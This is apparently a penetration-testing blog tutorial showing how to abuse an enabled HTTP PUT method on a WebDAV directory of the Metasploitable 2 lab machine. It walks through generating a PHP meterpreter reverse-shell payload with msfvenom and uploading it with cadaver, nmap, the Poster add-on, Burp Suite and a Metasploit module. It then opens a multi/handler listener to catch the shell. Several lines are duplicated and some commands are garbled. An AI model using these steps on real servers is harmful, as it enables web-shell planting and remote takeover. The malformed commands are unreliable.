Today’s article is related to bypass PUT method vulnerability through various techniques. From previous article we came across to different actions performed by HTTP methods where I had described the role of PUT method which allow client to upload a file on server. Now I will take advantage of this method for uploading a malicious file and make server compromise.
Target: Metasploitable 2
Attacker: Kali Linux
Let’s Begin!!!!
Boot up your kali Linux and Open Firefox Type victim IP: 192.168.1.4 in url and click on WEBDAV. Here you can see it is showing only parent directory. Now turn on terminal for executing the following commands through it.
First of all make sure the PUT method must be allowed by HTTP on server, for confirming this we need to scan the target using nikto.
nikto –http://192.168.1.4/dav/
The highlighted part showing PUT method is allowed. Now it is time to hack the server by uploading PHP malicious file using following techniques.
The highlighted part showing PUT method is allowed. Now it is time to hack the server by uploading PHP malicious file using following techniques.
msfvenom -p php/meterpreter/reverse_tcplhost=192.168.1.5 lport=4444 -f raw.
Copy the code from
Now load metasploit framework by typing msfconsole on a new terminal and start multi/handler
Cadaver
Cadaver is installed in kali which is command line tool that support uploading and downloading of a file on webdav.
Type host URL where you want to upload your file using first command given below.
Cadaver http://192.168.1.4/dav/
Now you are inside victim’s directory. Upload the shell.php here by executing below command and these two commands will let you upload your file on target machine.
put /root/Desktop/shell.php
Cadaver http://192.168.1.4/dav/
Now you are inside victim’s directory. Upload the shell.php here by executing below command and these two commands will let you upload your file on target machine.
put /root/Desktop/shell.php
msf> use exploit/multi/handler
msf exploit(handler) > set lport 4444
msf exploit(handler) > set lhost 192.168.1.5
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
meterpreter>sysinfo
It will give you a meterpreter session.
Nmap
Uploads a local file to a remote web server using the HTTP PUT method.You must specify the filename and URL path with NSE arguments.Prepare the malicious file nmap.php that you want to upload.
nmap -p 80 192.168.1.4 –script http-put –script-args http-put.url=’/dav/nmap.php’,http-put.file=’/root/Desktop/nmap.php’
It is disclosed in its result that nmap.php is uploaded successfully now let’s check it.
nmap -p 80 192.168.1.4 –script http-put –script-args http-put.url=’/dav/nmap.php’,http-put.file=’/root/Desktop/nmap.php’
It is disclosed in its result that nmap.php is uploaded successfully now let’s check it.
Again types same URL in browser 192.168.1.4/dav and make it run. Yes we have got our file nmap.php on web server.
Simultaneously, open metasploit and use multi/handler; then go back to uploaded nmap.php file and run it.
It will also give your meterpreter session.
Poster
Install poster plug-in from Firefox add-on. As poster let you perform HTTP request with parameters like: GET, POST, PUT and DELETE. Prepare the malicious file poster.php that you would upload. Click on the tools from the menu bar. And then click on Poster from the drop down menu. A following dialog box will open. Here, type URL as mention in screenshot browse the file that you will upload and click on PUT option. This exploring will show you that PUT method is allowed that means you can upload through it.
All together, run multi/handler; then go back to uploaded poster.php file and click on it.A meterpreter session will get open again.
Burpsuite
Now right click on its window and a list of options will appear. Further click on send to repeater.
The GET method is present in header of request and we need PUT method to upload file. Here I am going to replace this method with PUT. Prepare the malicious file burp.php that you need to upload.
Metasploit
Metasploit
This module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests. Set ACTION to either PUT or DELETE. PUT is the default. If filename isn’t specified, the module will generate a random string for you as a .txt file. If DELETE is used, a filename is required.
Use msf>auxiliary/scanner/http/http_put
Msf>auxiliary (http_put) > set rhosts 192.168.1.4
Msf>auxiliary (http_put) > set payload php/meterpreter/reverse_tcp
Msf>auxiliary (http_put) > set path /dav/
Msf>auxiliary (http_put) > set filename meta.php
Msf>auxiliary (http_put) > set filedata file://root/Desktop/meta.php
Msf>auxiliary (http_put) > exploit
Run same URL in browser 192.168.1.4/dav. Last but not the least, again we have got our file meta.php on web server which means message “the upload probably failed” by metasploit is not true.
No comments:
Post a Comment